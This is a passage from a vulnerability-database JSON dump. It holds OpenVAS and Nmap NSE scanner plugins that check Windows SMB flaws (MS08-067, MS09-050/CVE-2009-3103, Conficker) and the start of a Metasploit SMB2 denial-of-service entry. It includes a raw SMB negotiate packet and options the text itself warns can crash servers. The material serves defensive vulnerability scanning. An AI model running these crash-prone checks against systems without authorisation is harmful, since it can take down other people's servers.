Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)\";\n\nif(description)\n{\n script_id(104116);\n script_version(\"$Revision: 5499 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-06 14:06:09 +0100 (Mon, 06 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Nmap NSE net: smb-check-vulns\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"smbport\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign\", value:\"\", type:\"entry\");\n script_add_preference(name:\"safe\", value:\"\", type:\"entry\");\n script_add_preference(name:\"unsafe\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script does't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"smbport\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbport\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"randomseed\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"randomseed\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"smbbasic\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbbasic\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"smbsign\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbsign\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"safe\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"safe\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"unsafe\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"unsafe\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"smb-check-vulns\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"smb-check-vulns\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (smb-check-vulns.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-30T21:33:44", "references": ["http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx"], "pluginID": "1361412562310900965", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-050.", "edition": 5, "reporter": "Copyright (C) 2009 SecPod", "published": "2009-10-15T00:00:00", "title": "Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows : Microsoft Bulletins", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "modified": "2018-11-30T00:00:00", "id": "OPENVAS:1361412562310900965", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900965", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms09-050-remote.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability\n#\n# Authors:\n# Chandrashekhar B <bchandra@secpod.com>\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900965\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-15 12:43:47 +0200 (Thu, 15 Oct 2009)\");\n script_bugtraq_id(36299);\n script_cve_id(\"CVE-2009-2526\", \"CVE-2009-2532\", \"CVE-2009-3103\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Windows : Microsoft Bulletins\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_dependencies(\"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute code with SYSTEM-level\n privileges. Failed exploit attempts will likely cause denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"- Windows 7 RC\n\n - Windows Vista and\n\n - Windows 2008 Server\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities exists,\n\n - A denial of service vulnerability exists in the way that Microsoft Server\n Message Block (SMB) Protocol software handles specially crafted SMB version 2 (SMBv2) packets.\n\n - Unauthenticated remote code execution vulnerability exists in the way\n that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB packets.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS09-050.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\n\nport = kb_smb_transport();\nif( ! port ) port = 445;\nif( ! get_port_state( port ) ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\ndata = raw_string( 0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8,\n 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe,\n 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,\n 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,\n 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,\n 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,\n 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,\n 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54,\n 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e,\n 0x30,0x30,0x32,0x00 );\n\nsend( socket:soc, data:data );\nresp = smb_recv( socket:soc );\nclose( soc );\n# '0xff' -> SMBv1 - Windows XP Profesional, Version 202, SP3\n# '0xff' -> SMBv1 - Samba 3.0.33\n# '0xfe' -> SMBv2 - Windows Server@enterprise (2008), SP\n# After applying patch, strlen(resp) is > 77\n\nif( resp ) {\n\n if( strlen( resp ) < 9 ) exit( 0 );\n\n if( ord( resp[4]) == 255 && ord( resp[5] ) == 83 && ord( resp[6] ) == 77 && ord( resp[7] ) == 66 &&\n ord( resp[8] ) == 114 && strlen( resp ) == 77 ) {\n security_message( port:port );\n exit( 0 );\n }\n exit( 99 );\n}\n\nexit( 0 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:32:19", "references": ["https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025"], "pluginID": "1361412562310803571", "description": "Checks for vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000\n\n - SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n\n - MS06-025, a Windows Ras RPC service vulnerability\n\n - MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter ", "edition": 9, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2013-02-28T00:00:00", "title": "Nmap NSE 6.01: smb-check-vulns", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Nmap NSE", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4250", "CVE-2006-2370", "CVE-2007-1748", "CVE-2009-3103", "CVE-2006-2371"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310803571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap6_smb_check_vulns.nasl 12127 2018-10-26 13:14:31Z cfischer $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803571\");\n script_version(\"$Revision: 12127 $\");\n script_cve_id(\"CVE-2006-2370\", \"CVE-2006-2371\", \"CVE-2007-1748\", \"CVE-2008-4250\", \"CVE-2009-3103\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:14:31 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:01:00 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: smb-check-vulns\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n script_dependencies(\"nmap_nse.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap6.01\", \"Tools/Launch/nmap_nse\");\n\n script_add_preference(name:\"smbport\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign\", value:\"\", type:\"entry\");\n script_add_preference(name:\"safe\", value:\"\", type:\"entry\");\n script_add_preference(name:\"unsafe\", value:\"\", type:\"entry\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067\");\n\n script_tag(name:\"summary\", value:\"Checks for vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000\n\n - SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n\n - MS06-025, a Windows Ras RPC service vulnerability\n\n - MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system. Do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something.\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated.\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'.\nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for\nenumerating users if you turn on basic authentication.\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign\npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n - 'force': Always check server signatures, even if server says it doesn't support them (will\nprobably fail, but is technically more secure).\n\n - 'negotiate': [default] Use signatures if server supports them.\n\n - 'ignore': Never check server signatures. Not recommended.\n\n - 'disable': Don't send signatures, at all, and don't check the server's. not recommended.\nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe.\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\ni = 0;\n\nport = script_get_preference(\"smbport\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\npref = script_get_preference(\"smbport\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbport', '=', pref, '\"');\n}\npref = script_get_preference(\"randomseed\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'randomseed', '=', pref, '\"');\n}\npref = script_get_preference(\"smbbasic\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbbasic', '=', pref, '\"');\n}\npref = script_get_preference(\"smbsign\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbsign', '=', pref, '\"');\n}\npref = script_get_preference(\"safe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'safe', '=', pref, '\"');\n}\npref = script_get_preference(\"unsafe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'unsafe', '=', pref, '\"');\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port, get_host_ip());\n\nif(i > 0) {\n scriptArgs = \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv, scriptArgs);\n}\n\nif(TARGET_IS_IPV6())\n argv = make_list(argv, \"-6\");\n\ntiming_policy = get_kb_item(\"Tools/nmap/timing_policy\");\nif(timing_policy =~ '^-T[0-5]$')\n argv = make_list(argv, timing_policy);\n\nsource_iface = get_preference(\"source_iface\");\nif(source_iface =~ '^[0-9a-zA-Z:_]+$') {\n argv = make_list(argv, \"-e\");\n argv = make_list(argv, source_iface);\n}\n\nres = pread(cmd:\"nmap\", argv:argv);\n\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n', 'nmap ', argv);\n log_message(data: msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:32:19", "references": ["https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025"], "pluginID": "1361412562310801287", "description": "This script attempts to check the following vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS\n\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner", "edition": 8, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2010-09-23T00:00:00", "title": "Nmap NSE: SMB Check Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Nmap NSE", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4250", "CVE-2006-2370", "CVE-2007-1748", "CVE-2009-3103", "CVE-2006-2371"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310801287", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801287", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_smb_check_vulns.nasl 12115 2018-10-26 09:30:41Z cfischer $\n#\n# Wrapper for Nmap SMB Check Vulnerabilities NSE script.\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# NASL-Wrapper: Copyright (c) 2010 Greenbone Networks GmbH (http://www.greenbone.net)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801287\");\n script_version(\"$Revision: 12115 $\");\n script_cve_id(\"CVE-2006-2370\", \"CVE-2006-2371\", \"CVE-2007-1748\", \"CVE-2008-4250\", \"CVE-2009-3103\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 11:30:41 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-23 08:22:30 +0200 (Thu, 23 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Nmap NSE: SMB Check Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n script_dependencies(\"nmap_nse.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap\", \"Tools/Launch/nmap_nse\");\n\n script_add_preference(name:\"safe :\", value:\"no\", type:\"checkbox\");\n script_add_preference(name:\"unsafe :\", value:\"no\", type:\"checkbox\");\n script_add_preference(name:\"smbusername :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbpassword :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbdomain :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbport :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbtype :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbnoguest :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbhash :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign :\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed :\", value:\"\", type:\"entry\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/975497\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067\");\n\n script_tag(name:\"summary\", value:\"This script attempts to check the following vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS\n\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's smb-check-vulns.nse.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nif((! get_kb_item(\"Tools/Present/nmap5.21\") &&\n ! get_kb_item(\"Tools/Present/nmap5.51\")) ||\n ! get_kb_item(\"Tools/Launch/nmap_nse\")) {\n exit(0);\n}\n\nport = script_get_preference(\"smbport :\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port, get_host_ip());\n\ni = 0;\nif( \"yes\" == script_get_preference(\"safe :\")){\n args[i++] = \"safe=1\";\n}\n\nif( \"yes\" == script_get_preference(\"unsafe :\")){\n args[i++] = \"unsafe=1\";\n}\n\nif( pref = script_get_preference(\"smbusername :\")){\n args[i++] = \"smbusername=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbpassword :\")){\n args[i++] = \"smbpassword=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbdomain :\")){\n args[i++] = \"smbdomain=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbtype :\")){\n args[i++] = \"smbtype=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbnoguest :\")){\n args[i++] = \"smbnoguest=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbhash :\")){\n args[i++] = \"smbhash=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbbasic :\")){\n args[i++] = \"smbbasic=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbsign :\")){\n args[i++] = \"smbsign=\"+pref;\n}\n\nif( pref = script_get_preference(\"randomseed :\")){\n args[i++] = \"randomseed=\"+pref;\n}\n\nif(i > 0) {\n scriptArgs = \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv, scriptArgs);\n}\n\nif(TARGET_IS_IPV6())\n argv = make_list(argv, \"-6\");\n\ntiming_policy = get_kb_item(\"Tools/nmap/timing_policy\");\nif(timing_policy =~ '^-T[0-5]$')\n argv = make_list(argv, timing_policy);\n\nsource_iface = get_preference(\"source_iface\");\nif(source_iface =~ '^[0-9a-zA-Z:_]+$') {\n argv = make_list(argv, \"-e\");\n argv = make_list(argv, source_iface);\n}\n\nres = pread(cmd:\"nmap\", argv:argv);\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n\n if (\"INFECTED\" >< result)\n set_kb_item(name:\"conficker/nse\", value:result);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n');\n log_message(data : msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-24T23:32:15", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", "reporter": "Rapid7", "published": "2010-04-15T16:08:27", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", "enchantments": {"score": 